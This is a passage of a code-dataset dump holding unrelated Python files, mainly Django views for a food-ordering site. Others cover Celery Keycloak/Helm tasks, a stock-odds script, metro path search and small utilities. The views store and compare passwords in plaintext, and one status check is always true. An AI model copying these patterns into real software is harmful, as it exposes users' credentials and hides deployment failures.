import send_mail\nfrom django.conf import settings\nfrom collections import Counter\nimport datetime\nfrom django.contrib.auth import logout\nfrom random import randint\nimport json\n\n# Create your views here.\ndef index(request):\n items = Item.objects.all()\n return render(request,'index.html', {'items': items})\n \n\ndef showUlogin(request):\n return render(request, 'registerUser.html')\n\n\ndef Uregister(request):\n if request.method == \"POST\":\n fname = request.POST.get('fname')\n lname = request.POST.get('lname')\n username = request.POST.get('username')\n password = request.POST.get('password')\n email = request.POST.get('email')\n phone_no = request.POST.get('phone')\n address1 = request.POST.get('add1')\n address2 = request.POST.get('add2')\n city = request.POST.get('city')\n state = request.POST.get('state')\n if RestroUser.objects.filter(email=email).exists():\n messages.info(request, \"Already Registered\")\n return render(request, 'registerUser.html')\n else:\n user = RestroUser(username=username, password=password, first_name=fname,\n last_name=lname,email=email,phone_no=phone_no, address1 = address1, \n address2=address2,city=city,state=state)\n user.save()\n return redirect('/user')\n # return render(request, 'example.html')\n else:\n return render(request, 'registerUser.html')\n\n\ndef Ulogin(request):\n if request.user.is_authenticated:\n restrolist = Restaurant.objects.filter()\n request.session[\"uid_save\"] = request.user.id\n now = datetime.datetime.now()\n print(now)\n myorders = Order.objects.filter(uId = request.user.id)\n print(myorders)\n itemidlist = []\n for i in myorders:\n x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName', 'Image')\n print(x)\n print(type(x))\n itemidlist.append(x)\n \n print(itemidlist)\n return render(request, 'userhome.html', {'restro': restrolist, 'orders': itemidlist})\n else: \n if request.method == \"POST\":\n username = request.POST.get('username')\n password = request.POST.get('password')\n # print(username)\n # print(password)\n user = RestroUser.objects.get(username = username, password = password)\n # print(user)\n if user is not None:\n auth.login(request, user)\n restrolist = Restaurant.objects.filter()\n request.session[\"uid_save\"] = user.id\n now = datetime.datetime.now()\n print(now)\n myorders = Order.objects.filter(uId = user.id)\n print(myorders)\n itemidlist = []\n for i in myorders:\n x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName', 'Image')\n print(x)\n print(type(x))\n itemidlist.append(x)\n \n print(itemidlist)\n return render(request, 'userhome.html', {'restro': restrolist, 'orders': itemidlist})\n else:\n messages.info(request, 'Invalid Credentials !')\n return render(request, 'registerUser.html')\n else:\n messages.info(request, 'Invalid Method !')\n return redirect('showUlogin')\n\n\ndef homepage(request):\n if \"rid_save\" in request.session:\n rid_save_item = request.session[\"rid_save\"]\n\n getItems = Item.objects.filter(rId = rid_save_item)\n myorders = Order.objects.filter(rId = rid_save_item)\n print(myorders)\n itemidlist = []\n for i in myorders:\n x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName', 'Image')\n print(x)\n print(type(x))\n itemidlist.append(x)\n return render(request, 'example.html', {'items': getItems, 'orders': itemidlist})\n\n\ndef showRlogin(request):\n return render(request, 'registerRestro.html')\n\n\ndef Rregister(request):\n if request.method == \"POST\" and request.FILES['logo']:\n name = request.POST.get('name')\n password = request.POST.get('password')\n email = request.POST.get('email')\n phone_no = request.POST.get('phone')\n address1 = request.POST.get('add1')\n address2 = request.POST.get('add2')\n city = request.POST.get('city')\n state = request.POST.get('state')\n logo = request.FILES['logo']\n fs = FileSystemStorage()\n filename = fs.save(logo.name, logo)\n url = fs.url(filename)\n if Restaurant.objects.filter(email=email).exists():\n messages.info(request, \"Already Registered\")\n return render(request, 'registerRestro.html')\n else:\n user = Restaurant(RestroName=name, restro_phone=phone_no, password=password, \n email=email, address1 = address1, address2=address2, city=city, state=state, \n logo=url)\n user.save()\n return redirect('/Rlogin')\n # return render(request, 'example.html')\n else:\n return render(request, 'registerUser.html')\n\n\ndef Rlogin(request):\n if request.method == \"POST\":\n email = request.POST.get('email')\n password = request.POST.get('password')\n user = Restaurant.objects.get(email = email, password = password)\n # print(user)\n if user is not None:\n rId = user.RId\n # print(rId)\n # rId = Restaurant.objects.only('RId').get(email=email)\n request.session[\"rid_save\"] = rId\n\n getItems = Item.objects.filter(rId = rId)\n myorders = Order.objects.filter(rId = rId)\n print(myorders)\n itemidlist = []\n for i in myorders:\n x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName', 'Image')\n print(x)\n print(type(x))\n itemidlist.append(x)\n return render(request, 'example.html', {'items': getItems, 'orders': itemidlist})\n \n else:\n messages.info(request, 'Invalid Credentials !')\n return render(request, 'registerUser.html')\n else:\n messages.info(request, 'Invalid Method !')\n return redirect('project_app:restro')\n\n\ndef menu(request):\n return render(request, 'menu.html')\n\n\ndef addItem(request):\n if request.method == 'POST' and request.FILES['dish']:\n rid_save_item = None\n if \"rid_save\" in request.session:\n rid_save_item = request.session[\"rid_save\"]\n print(rid_save_item)\n r_id = Restaurant.objects.only(\"RId\").get(RId = rid_save_item)\n ItemName = request.POST.get('title')\n Description = request.POST.get('ingredients')\n price = request.POST.get('price')\n logo = request.FILES['dish']\n fs = FileSystemStorage()\n filename = fs.save(logo.name, logo)\n url = fs.url(filename)\n print(ItemName, Description, price, logo, url)\n saveitem = Item(rId = r_id, ItemName=ItemName, Description=Description, price=price,Image=url)\n saveitem.save()\n return redirect('/menu')\n else:\n messages.info(request, 'Invalid Method !')\n return redirect('/menu')\n\n\ndef showcart(request, rid):\n # if \"uid_save\" in request.session:\n # uid_save_item = request.session[\"uid_save\"]\n\n # u_id = Restaurant.objects.only(\"RId\").get(RId = rid_save_item)\n items = Item.objects.filter(rId = rid)\n # print(rid)\n # print(type(rid))\n request.session[\"rid_cart\"] = rid\n return render(request, 'cart4.html', {'items': items})\n\n\n# def set_cookie(request):\n# if \"rid_cart\" in request.session:\n# rid = request.session[\"rid_cart\"]\n# items = Item.objects.filter(rId = rid)\n# response = render(request, 'cart2.html', {'items': items})\n\ndef placeorder(request, item):\n print('in placeorder')\n if \"uid_save\" in request.session:\n uid_save_item = request.session[\"uid_save\"]\n\n if \"rid_cart\" in request.session:\n riD = request.session[\"rid_cart\"]\n\n if request.method == 'POST':\n quant = request.POST.get('quant')\n\n print('quant ',quant)\n uId = RestroUser.objects.only(\"id\").get(id= uid_save_item)\n rId = Restaurant.objects.only(\"RId\").get(RId = riD)\n itemId = Item.objects.only(\"ItemId\").get(ItemId = item)\n print(itemId.price)\n print(type(itemId.price))\n amount = (itemId.price)*int(quant)\n print('amt - ', amount)\n order = Order(uId = uId, rId = rId, itemId = itemId, quantity = quant, amount = amount)\n order.save()\n print(' order saved ')\n messages.info(request, \"Order places successfully\")\n # restrolist = Restaurant.objects.filter()\n items = Item.objects.filter(rId = rId)\n return render(request, 'cart4.html', {'items': items})\n\n\ndef contact(request):\n if request.method == \"POST\":\n name = request.POST.get('name')\n email = request.POST.get('email')\n mess = request.POST.get('message')\n\n # send_mail('Contact Form', mess, settings.EMAIL_HOST_USER, [email id], fail_silently=False)\n\n return redirect('index')\n\n \ndef gohome(request):\n logout(request)\n return redirect('/')\n\n\ndef myorders(request):\n # ono = randint(100000, 999999)\n # request.session[\"ono_save\"] = ono\n if \"uid_save\" in request.session:\n uid_save_item = request.session[\"uid_save\"] \n # order_details = Order.objects.filter(uId = uid_save_item)\n # itemidlist = []\n # restrolist = []\n # total = 0\n # for i in order_details:\n # total += i.amount\n # x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName','price')\n # itemidlist.append(x)\n # y = Restaurant.objects.filter(RId = i.rId.RId).values('RestroName')\n # restrolist.append(y)\n\n # aftertax = total + (0.05*total)\n # delivery = aftertax + 5\n osummary = OrderSummary.objects.filter(uid = uid_save_item)\n osummary = osummary[len(osummary) - 1]\n print(osummary)\n jsonDec = json.decoder.JSONDecoder()\n itemidlist = []\n \n itemidlist.append(jsonDec.decode(osummary.itemslist))\n # itemidlist = jsonDec.decode(osummary.itemslist)\n print(itemidlist)\n # print(itemidlist[0])\n # print(itemidlist[0][0])\n # print(itemidlist)\n # itemdetails = []\n # qt = []\n # for i in itemidlist:\n # for j in i:\n # for k in j:\n # x = Item.objects.values_list('ItemName', 'price').get(ItemId = k['ItemId'])\n # print(x)\n # q = Order.objects.values_list('quantity').get(uId = uid_save_item, itemId = k['ItemId'])\n # print(q)\n # itemd = x + q\n # print(itemd)\n # print(type(itemd))\n # # x = Item.objects.filter(ItemId = k['ItemId']).values('ItemName','price')\n # # print(x)\n # # itemdetails.append(x)\n # # q = Order.objects.filter(uId = uid_save_item, itemId = k['ItemId']).values('quantity')\n # # qt.append(int(q))\n # # x.extra(\n # # select= {'qt': q}\n # # )\n # # print(x)\n # # x['qt'] = q\n # itemdetailes.append(itemd)\n\n restrodetails = []\n y = Restaurant.objects.values_list('RestroName').get(RId = osummary.rid.RId)\n restrodetails.append(y[0])\n qtlist = []\n for i in range(len(itemidlist)):\n print('i', i)\n for j in itemidlist[i]:\n print('j',j)\n print(type(j))\n print(j[0])\n x = Order.objects.values_list('quantity').get(itemId = j[0])\n # print('x' , x)\n x = list(x)\n qtlist.append(x)\n # print(itemidlist[i].index(j))\n # print(type(int(itemidlist[i].index(j))))\n # itemidlist[itemidlist[i].index(j)].append(x)\n print(itemidlist)\n print(qtlist)\n k = 0\n while k < len(qtlist):\n print('k',k)\n for i in itemidlist:\n for j in i:\n j.append(qtlist[k][0])\n k += 1\n\n print(itemidlist)\n # print(userdetails)\n # print(userdetails[0][0])\n # total = osummary[len(osummary) - 1].total \n # after_tax = osummary[len(osummary) - 1].aftertax\n total = osummary.total\n after_tax = osummary.aftertax\n return render(request, 'myorders2.html', {'order': osummary, 'restro': y[0], 'item':itemidlist, 'total':total, 'tax': after_tax})\n # return render(request, 'myorders.html', {'ono':ono,\n # 'order':order_details, 'item':itemidlist, \n # 'restro': restrolist ,'total':total,'tax':delivery})\n\n\ndef rorders(request):\n \n if \"rid_save\" in request.session:\n riD = request.session[\"rid_save\"]\n # jsonDec = json.decoder.JSONDecoder()\n # myPythonList = jsonDec.decode(myModel.myList)\n # order_details = Order.objects.filter(rId = riD)\n # itemidlist = []\n # userlist = []\n # total = 0\n\n # for i in order_details:\n # total += i.amount\n # x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName','price')\n # itemidlist.append(x)\n # y = RestroUser.objects.filter(id = i.uId.id).values('address1', 'address2', 'city')\n # userlist.append(y)\n\n\n # aftertax = total + (0.05*total)\n # delivery = aftertax + 5\n\n osummary = OrderSummary.objects.filter(rid = riD)\n print(osummary)\n try:\n osummary = osummary[len(osummary) - 1]\n except:\n pass\n jsonDec = json.decoder.JSONDecoder()\n itemidlist = []\n itemidlist.append(jsonDec.decode(osummary.itemslist))\n # itemidlist = jsonDec.decode(osummary[0].itemslist)\n print(itemidlist)\n print(itemidlist[0])\n print(itemidlist[0][0])\n # print(itemidlist)\n itemdetails = []\n # for i in itemidlist:\n # for j in i:\n # for k in j:\n # x = Item.objects.filter(ItemId = k['ItemId']).values('ItemName','price')\n # itemdetails.append(x)\n\n userdetails = []\n y = RestroUser.objects.values_list('address1', 'address2', 'city').get(id = osummary.uid.id)\n # y = RestroUser.objects.get(id = i.uid.id).only('address1', 'address2', 'city')\n userdetails.append(y)\n print(userdetails)\n print(userdetails[0][0])\n\n qtlist = []\n for i in range(len(itemidlist)):\n print('i', i)\n for j in itemidlist[i]:\n print('j',j)\n print(type(j))\n print(j[0])\n x = Order.objects.values_list('quantity').get(itemId = j[0])\n # print('x' , x)\n x = list(x)\n qtlist.append(x)\n # print(itemidlist[i].index(j))\n # print(type(int(itemidlist[i].index(j))))\n # itemidlist[itemidlist[i].index(j)].append(x)\n print(itemidlist)\n print(qtlist)\n k = 0\n while k < len(qtlist):\n print('k',k)\n for i in itemidlist:\n for j in i:\n j.append(qtlist[k][0])\n k += 1\n\n print(itemidlist)\n\n\n total = osummary.total\n after_tax = osummary.aftertax\n return render(request, 'rorders.html', {'order': osummary, 'item':itemidlist, 'address': {'1': userdetails[0][0], '2': userdetails[0][1], '3':userdetails[0][2] }, 'total':total, 'aftertax': after_tax})\n # return render(request, 'rorders.html', {'ono':ono,'order':order_details, 'item':itemidlist, 'address': userlist,'total':total,'tax':delivery})\n\n\ndef update_status(request, oid):\n x = OrderSummary.objects.filter(osid = oid)\n if request.method == 'POST':\n st = request.POST.get('status')\n \n for i in x:\n i.status = st\n i.save()\n return redirect('/')\n\n\n# def order_summary(request):\n# ono = randint(100000, 999999)\n# if \"uid_save\" in request.session:\n# uid_save_item = request.session[\"uid_save\"]\n# d = datetime.date.today()\n# order_details = Order.objects.filter(uId = uid_save_item, odate = d)\n# # d = order_details[0].date.date()\n# uid = order_details[0].uId\n# elif \"rid_save\" in request.session:\n# riD = request.session[\"rid_save\"]\n# order_details = Order.objects.filter(rId = riD)\n# d = order_details[0].date.date()\n# uid = order_details[0].uId\n \n# itemidlist = []\n# total = 0\n\n# for i in order_details:\n# total += i.amount\n# x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemId','ItemName','price')\n# itemidlist.append(list(x))\n \n# # print(itemidlist)\n# # print(type(itemidlist[0]))\n# total = total + (0.05*total)\n# total += 5\n# itemlist = json.dumps(itemidlist)\n# osummary = OrderSummary(ono=ono, uid = uid, rid= order_details[0].rId, date= d, itemslist= itemlist, total=total)\n# osummary.save()\n# return redirect('/Ulogin')\n\n\ndef order_summary(request):\n ono = randint(100000, 999999)\n if \"uid_save\" in request.session:\n uid_save_item = request.session[\"uid_save\"]\n\n d = datetime.date.today()\n order_details = Order.objects.filter(uId = uid_save_item, odate = d)\n uid = order_details[0].uId\n \n itemidlist = []\n after_tax = 0.0\n total = 0\n for i in order_details:\n total += i.amount\n x = Item.objects.values_list('ItemId' ,'ItemName', 'price').get(ItemId = i.itemId.ItemId)\n itemidlist.append(x)\n after_tax = total + (0.05*total) + 5\n itemlist = json.dumps(itemidlist)\n osummary = OrderSummary(date = d, ono = ono, uid=uid, rid=order_details[0].rId, \n itemslist= itemlist, total=total, aftertax=after_tax)\n osummary.save()\n return redirect('/Ulogin')\n else: \n messages.info(\"Order not successfull\")\n return redirect('user')\n","sub_path":"FoodOrder/project_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442361809","text":"#script para instanciar la pantalla de los comentarios y guardar.\r\n#importamos librerias\r\nfrom PyQt5 import QtWidgets\r\nfrom ventana_guardar import Ui_Comentarios_Guardar\r\n#clase principal\r\nclass Guardar(QtWidgets.QMainWindow):\r\n def __init__(self,nombre):\r\n super().__init__()\r\n #obtenemos la ui\r\n self.ui = Ui_Comentarios_Guardar(nombre)\r\n #la cargamos\r\n self.ui.setupUi(self)\r\n\r\n\r\n","sub_path":"comentarios_guardar.py","file_name":"comentarios_guardar.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135760218","text":"from celery import shared_task\nimport requests as r\nimport yaml\nimport base64\n\nimport modules.keycloak_lib as keylib\n\nfrom .exceptions import ProjectCreationException\n\nfrom django.conf import settings\n\n@shared_task\ndef create_keycloak_client_task(project_slug, username, repository):\n # Create Keycloak client for project with default project role.\n # The creator of the project assumes all roles by default.\n print('Creating Keycloak resources.')\n HOST = settings.DOMAIN\n print('host: '+HOST)\n RELEASE_NAME = str(project_slug)\n print('release: '+RELEASE_NAME)\n URL = 'https://{}/{}/{}'.format(HOST, username, RELEASE_NAME)\n print(URL)\n \n keylib.keycloak_setup_base_client(URL, RELEASE_NAME, username, settings.PROJECT_ROLES, settings.PROJECT_ROLES)\n\n print('Done Keycloak.')\n\n\ndef create_settings_file(project_slug):\n proj_settings = dict()\n \n proj_settings['active'] = 'stackn'\n proj_settings['client_id'] = 'studio-api'\n proj_settings['realm'] = settings.KC_REALM\n proj_settings['active_project'] = project_slug\n\n return yaml.dump(proj_settings)\n\n@shared_task\ndef create_helm_resources_task(project_slug, project_key, project_secret, repository=None):\n from .helpers import decrypt_key\n proj_settings = create_settings_file(project_slug)\n parameters = {'release': str(project_slug),\n 'chart': 'project',\n 'minio.access_key': decrypt_key(project_key),\n 'minio.secret_key': decrypt_key(project_secret),\n 'global.domain': settings.DOMAIN,\n 'storageClassName': settings.STORAGECLASS,\n 'settings_file': proj_settings}\n if repository:\n parameters.update({'labs.repository': repository})\n\n url = settings.CHART_CONTROLLER_URL + '/deploy'\n\n retval = r.get(url, parameters)\n print(\"CREATE_PROJECT:helm chart creator returned {}\".format(retval))\n\n if retval.status_code >= 200 or retval.status_code < 205:\n # return True\n print('DONE CREATING PROJECT HELM DEPLOYMENT')\n else:\n print('FAILED TO CREATE PROJECT HELM DEPLOYMENT')\n raise ProjectCreationException(__name__)","sub_path":"components/studio/projects/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"629041675","text":"import numpy as np\n\n\ndef forecast(result_file_path, test_data_x_path, p_data_path):\n file = open(result_file_path, \"w+\")\n testDataX = np.loadtxt(test_data_x_path)\n P = np.loadtxt(p_data_path)\n testDataX = np.column_stack(([testDataX], [[1]]))\n P = np.array(P)\n res = np.dot(P, np.transpose(testDataX))\n e = 2.718281828459\n res_ = 1 / (1 + e ** -res)\n rateForManyProblem = res_.sum(1)\n all_rate = 0\n print(rateForManyProblem.shape)\n for i in range(0, 20):\n all_rate += rateForManyProblem[i]\n for i in range(0, 20):\n values = (rateForManyProblem[i] * 100)\n cnt = values / all_rate\n info = \"股票明日收盘价比今日收盘价涨跌{0}%到{1}%的概率约为:{2}%\".format(str(i - 10), str(i - 9), str(round(cnt, 3)))\n file.write(info + \"\\n\")\n print(info)\n print(\"欢迎找我分析股票\")\n file.close()\n","sub_path":"logicTestV3.py","file_name":"logicTestV3.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8284318","text":"import json\nimport time\nfrom copy import deepcopy as c\nfrom Graph import Graph\nimport numpy as np\n\n\ndef ppp(input_start, input_end, input_alpha):\n graph = Graph(undirected=True)\n start = time.time()\n\n with open('trans.json', 'r', encoding='UTF-8') as json_file:\n trans_data = json.load(json_file)\n with open('edges_fix.json', 'r', encoding='UTF-8') as json_file:\n json_data = json.load(json_file)\n with open('line.json', 'r', encoding='UTF-8') as line_file:\n line_data = json.load(line_file)\n\n SeoulMetroLine_translist = {}\n\n for i in line_data:\n for j in line_data[i]:\n SeoulMetroLine_translist[j+i] = i\n # SeoulMetroLine_list2.append([j+i, i])\n\n def score_sub2(p_sub):\n cost2 = score_sub(p_sub)\n return cost2\n\n def score_sub(p_sub):\n cost = 0\n p_remaining = 1\n\n for i in range(len(p_sub)):\n\n p_i = 0.2 if p_sub[i] in trans_data[\"trans\"] else 0.5\n p_i = p_remaining * p_i\n p_remaining = p_remaining - p_i\n\n cost = cost + p_i * cal_path_weight(i, p_sub)\n return cost\n\n def cal_path_weight(idx, path):\n sum_path = 0\n for i in range(idx, len(path)-1):\n sum_path = sum_path + graph.get_cost(path[i], path[i+1])\n return sum_path\n\n def split(path):\n paths = []\n out_cost = 0\n sv = []\n for i in range(len(path)):\n sv.append(path[i])\n # if i in trans_data[\"trans\"] or i == in_end:\n if path[i] == in_end:\n out_cost = out_cost + score_sub2(sv)\n # paths.append(score_sub(sv))\n sv = []\n\n elif not SeoulMetroLine_translist[path[i]] == SeoulMetroLine_translist[path[i+1]]:\n out_cost = out_cost + score_sub2(sv)\n # paths.append(score_sub(sv))\n sv = []\n return out_cost\n\n\n count = 0\n newpaths2 = {}\n SeoulMetro = {}\n SeoulMetroLine = {}\n SeoulMetro_list = []\n SeoulMetroLine_list = []\n for i in json_data:\n # SeoulMetro[i] = {}\n if not i == \"Trans\":\n for j in json_data[i]:\n SeoulMetro_list.append([j[\"from\"]+i, j[\"to\"]+i, j[\"time\"]])\n SeoulMetro_list.append([j[\"to\"]+i, j[\"from\"]+i, j[\"time\"]])\n elif i == \"Trans\":\n for j in json_data[i]:\n SeoulMetro_list.append([j[\"from\"], j[\"to\"], j[\"time\"]])\n SeoulMetro_list.append([j[\"to\"], j[\"from\"], j[\"time\"]])\n\n\n for i in SeoulMetro_list:\n graph.insert(i[0], i[1], i[2])\n\n\n def find_all_paths(graph2, start, end, weight=0, path=[[], 0]):\n path[0], path[1] = path[0]+[start], path[1]+weight\n if start == end:\n return [path]\n paths = []\n for node, w in graph2[start].items():\n if node not in path[0] and path[1]+w <= threshold:\n newpaths = find_all_paths(graph2, node, end, w, c(path))\n for newpath in newpaths:\n paths.append(newpath)\n return paths\n\n\n # print(find_all_paths(graph, 'A', 'D'))\n # print(find_shortest_path(graph.cost_matrix, in_start, in_end))\n in_start = input_start\n in_end = input_end\n dijkstra_result = np.load('Dijkstra_result.npy')\n dijkstra_dict = {}\n for r in dijkstra_result:\n dijkstra_dict[r[0]] = r[1]\n alpha = input_alpha\n threshold = float(dijkstra_dict[in_end]) * alpha\n output = find_all_paths(graph.cost_matrix, in_start, in_end)\n candidate_paths = []\n for p in output:\n # saved.append(split(p[0]))\n path_cost = split(p[0])\n # p.append([(pow(p[1], -1)) * path_cost])\n p.append(path_cost)\n candidate_paths.append(p)\n\n candidate_paths2 = sorted(candidate_paths, key=lambda cp: cp[2])\n\n for i in candidate_paths2:\n print(i)\n\n print('Count:', len(output))\n print(\"time :\", time.time() - start)\n","sub_path":"findallpaths2.py","file_name":"findallpaths2.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"431817183","text":"def discover_shortest_path(outstanding_score, path, shortest_path_length):\n\n # if score is reduced to 0, return full path\n if outstanding_score == 0:\n return [path]\n\n # if the path has been longer than the shortest path, abort it and return an empty list\n if len(path) > shortest_path_length:\n return []\n\n paths = []\n\n # try all possiblities of different scores\n for base_score in [50, 25, 3, 2, 1]:\n\n count = outstanding_score // base_score\n\n if count < 1:\n continue\n\n if base_score in [50, 25]: # when it's bull and outer\n count = min(1, count)\n description = \"bull\" if base_score == 50 else \"outer\"\n path.append({\"score\": base_score, \"name\": description})\n else:\n count = min(20, count)\n prefix = \"s\"\n if base_score == 3:\n prefix = \"t\"\n elif base_score == 2:\n prefix = \"d\"\n path.append({\"score\": base_score * count, \"name\": prefix + str(count)})\n\n # process the next throw\n visited_paths = discover_shortest_path(\n outstanding_score - base_score * count,\n path,\n shortest_path_length,\n )\n print('visited_paths:{}'.format(visited_paths))\n\n for p in visited_paths:\n path_length = len(p)\n if 1 <= path_length <= shortest_path_length:\n # save the path if its length is no larger than shortest length\n paths.append(sorted(p, key=lambda x: x[\"score\"], reverse=True))\n # if find the new shortest length, use it for the next search\n if path_length < shortest_path_length:\n shortest_path_length = path_length\n\n path.pop()\n\n return paths\n\n\ndef find_min_throws(score):\n\n throws = discover_shortest_path(score, [], score)\n\n # get the combination with the least throws\n min_throw_count = min([len(t) for t in throws])\n min_throws = [t for t in throws if len(t) == min_throw_count]\n print('min_throws:{}'.format(min_throws))\n\n # sort throws by the highest score in each throw\n filtered_throws = min_throws\n for i in range(min_throw_count):\n max_score = max(t[i][\"score\"] for t in filtered_throws)\n filtered_throws = [t for t in filtered_throws if t[i][\"score\"] == max_score]\n\n response = [i[\"name\"] for i in filtered_throws[0]]\n return response\n\n\nif __name__ == \"__main__\":\n # print(find_min_throws(161))\n # print(find_min_throws(170))\n print(find_min_throws(148))\n","sub_path":"python/diff/darts.py","file_name":"darts.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161413588","text":"import sqlite3\r\nfrom binance.client import Client\r\nimport time\r\nimport matplotlib\r\nfrom matplotlib import cm\r\nimport matplotlib.pyplot as plt\r\nfrom binance.enums import *\r\nimport save_historical_data_Roibal\r\nfrom BinanceKeys import BinanceKey1\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pandas.io import sql\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\ndef store_historical_trades(symbol, num_entries = 500):\r\n\r\n\r\n \r\n trade_id =[]\r\n trade_price =[]\r\n trade_quantity =[]\r\n trade_timestamp =[]\r\n trade_maker_status =[]\r\n trade_best_match_status =[]\r\n \r\n \r\n\r\n\r\n try:\r\n\r\n con = sqlite3.connect(\"/Users/maarten/binance.db\")\r\n print('SQLite connection is open')\r\n\r\n df.to_sql(\"historical_trades\", con, if_exists = 'append', index = False,)\r\n\r\n\r\n finally:\r\n con.close()\r\n print('SQLite connection is closed')\r\n\r\n return df\r\n \r\nclass Position:\r\n \"\"\"\r\n Position main class\r\n \"\"\"\r\n\r\n def __init__(self, number, entry_price, size, exit_price, stop_loss):\r\n self.number = number\r\n self.type_ = \"None\"\r\n self.entry_price = float(entry_price)\r\n self.size = float(size)\r\n self.exit_price = float(exit_price)\r\n self.stop_loss = float(stop_loss)\r\n\r\n def show(self):\r\n \"\"\"\r\n Print position info\r\n :return:\r\n \"\"\"\r\n print(\"No. {0}\".format(self.number))\r\n print(\"Type: {0}\".format(self.type_))\r\n print(\"Entry: {0}\".format(self.entry_price))\r\n print(\"Size: {0}\".format(self.size))\r\n print(\"Exit: {0}\".format(self.exit_price))\r\n print(\"Stop: {0}\\n\".format(self.stop_loss))\r\n\r\n def __str__(self):\r\n return \"{} {}x{}\".format(self.type_, self.size, self.entry_price)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"OrderManager/order_manager.py","file_name":"order_manager.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299722974","text":"import os\nimport numpy as np\nimport scipy.optimize as opt\nimport scipy.interpolate as si\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nimport pickle\n\n# Data: http://www.computer-services.e.u-tokyo.ac.jp/p/cemano/research/DP/documents/coe-f-213.pdf?fbclid=IwAR2Q5JFemo8hNWF-rD7dZshJbz7a7CWFGiPJeUIHwa8iwlYqBmvfgeaZn8Q\nages = np.array([22, 27, 32, 37, 42, 47, 52, 57, 62, 65])\nability = np.array([0.646, 0.843, 0.999, 1.107, 1.165, 1.218, 1.233, 1.127, 0.820, 0.727])\nages = np.array([22, 27, 32, 37, 42, 47, 52, 57, 62, 65])\nability = np.array([0.646, 0.843, 0.999, 1.107, 1.165, 1.218, 1.233, 1.127, 0.820, 0.727])\nabil_fun = si.splrep(ages, ability)\n\ndef data_moments(vals):\n output = si.splev(vals, abil_fun)\n return output\n\ndef model_moments(x, a, b, c, d):\n y = - a * np.arctan(b * x + c) + d \n return y\n\ndef err_vec(params, *args):\n a, b, c, d = params\n vals, = args\n data_mms = data_moments(vals)\n model_mms = model_moments(vals, a, b, c, d)\n\n sumsq = ((model_mms - data_mms) ** 2).sum()\n return sumsq\n\ndef optimize(graph = False, update = False):\n # optimization Problem\n a = 0.5\n b = 0.5\n c = 0.5\n d = 0.5\n params_init = np.array([a,b,c,d])\n gmm_args = np.array([62, 63, 64, 65])\n\n results_GMM = opt.minimize(err_vec, params_init, args = gmm_args, method = 'L-BFGS-B')\n print(results_GMM)\n a,b,c,d = results_GMM.x\n\n if graph: \n # Graphing:\n ages = np.linspace(20, 100, 81)\n ages_full = np.linspace(20, 100, 81)\n ages_beg = np.linspace(20, 65, 46)\n print(ages_beg)\n ages_end = np.linspace(65, 100, 36)\n print(ages_end)\n result_beg = si.splev(ages_beg, abil_fun)\n result_end = model_moments(ages_end, a,b,c,d)\n plt.xlabel(r'Age $s$')\n plt.ylabel(r'Productivity Level $e_{j,s}$')\n plt.plot(ages_beg, result_beg, color = 'r', label = r'Interpolation')\n plt.legend(loc='upper right')\n\n plt.plot(ages_end, result_end, color = 'g', label = r'Extrapolation')\n plt.legend(loc='upper right')\n\n ages_data = np.array([22, 27, 32, 37, 42, 47, 52, 57, 62, 65])\n ability_data = np.array([0.646, 0.843, 0.999, 1.107, 1.165, 1.218, 1.233, 1.127, 0.820, 0.727])\n plt.scatter(ages_data, ability_data, color = 'b', label = r'Literature Values')\n plt.legend(loc='upper right')\n plt.grid(b=True, which='major', color='0.65', linestyle='-')\n plt.tight_layout(rect=(0, 0.03, 1, 1))\n plt.savefig(\"ability.png\")\n\n if update:\n #Update Ability Levels in our code: \n matrix = []\n for i in ages_full:\n line = [4 * i] * 7\n matrix.append(line)\n matrix = pd.DataFrame(matrix)\n print(matrix)\n pickle.dump(matrix, open('run_examples/ability.pkl', 'wb'))\n\noptimize(graph=True)","sub_path":"ogusa/calibration/ability_levels.py","file_name":"ability_levels.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"547869119","text":"import bag as dice\nimport numpy as np\n\ndef bonus(score):\n bonus = (score // 2) - 5\n return(bonus)\n\n#{score:points}\ndnd = {3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:1, 10:2, 11:3,\n 12:4, 13:5, 14:6, 15:8, 16:10, 17:13, 18:16}\n#have to extropolate down to 3 for pathfinder, it stops at 7\npath = {3:-4, 4:-4, 5:-4, 6:-4, 7:-4, 8:-2, 9:-1, 10:0, 11:1,\n 12:2, 13:3, 14:5, 15:7, 16:10, 17:13, 18:17}\n\n#4th ed is not fun\nfourth_8 = {3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:1, 10:2, 11:3,\n 12:4, 13:5, 14:7, 15:9, 16:11, 17:14, 18:18}\nfourth = {3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0, 10:0, 11:1,\n 12:2, 13:3, 14:5, 15:7, 16:9, 17:12, 18:16}\n\ndef points(game, 